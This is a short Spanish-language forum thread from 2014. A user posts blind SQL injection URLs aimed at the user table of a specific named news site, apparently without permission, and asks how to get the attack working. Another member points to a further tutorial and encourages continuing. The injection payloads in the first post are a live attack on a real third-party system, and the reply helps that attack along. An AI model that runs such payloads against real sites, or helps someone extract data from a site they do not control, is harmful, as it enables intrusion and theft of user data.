Imprimir Página - [SOLUCIONADO] Duda con Blind SQLi

Título: [SOLUCIONADO] Duda con Blind SQLi
Publicado por: Auditore12 en Junio 24, 2014, 11:30:24 AM

Buenas.

Hace rato estaba leyendo esto

http://underc0de.org/foro/index.php?topic=10124.0

y he cometido algún error. Verán:

www.fepal.net/noticias.php?id=4 AND (SELECT length(id) FROM usuario where cod=1) > 7

falso

www.fepal.net/noticias.php?id=4 AND (SELECT length(id) FROM usuario where cod=1) < 7

falso

www.fepal.net/noticias.php?id=4 AND (SELECT length(id) FROM usuario where cod=1) = 7

falso

www.fepal.net/noticias.php?id=4 AND (SELECT length(id) FROM usuario where cod=1) = 32

falso

¿qué más puedo probar en casos que me ocurra lo mismo?

¡Gracias!

Título: Re:Duda con Blind SQLi
Publicado por: ANTRAX en Junio 24, 2014, 12:23:50 PM

Hola, te recomiendo que leas este otro paper: http://underc0de.org/foro/index.php?topic=8387.msg

Puedes hacerlo con blind como lo estas haciendo, pero se te hará mas dificil

Saludos!
ANTRAX

Título: Re:Duda con Blind SQLi
Publicado por: Auditore12 en Junio 24, 2014, 12:45:27 PM

¡Muchas gracias!

Lo voy a probar.

Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: Auditore12 en Junio 24, 2014, 11:30:24 AM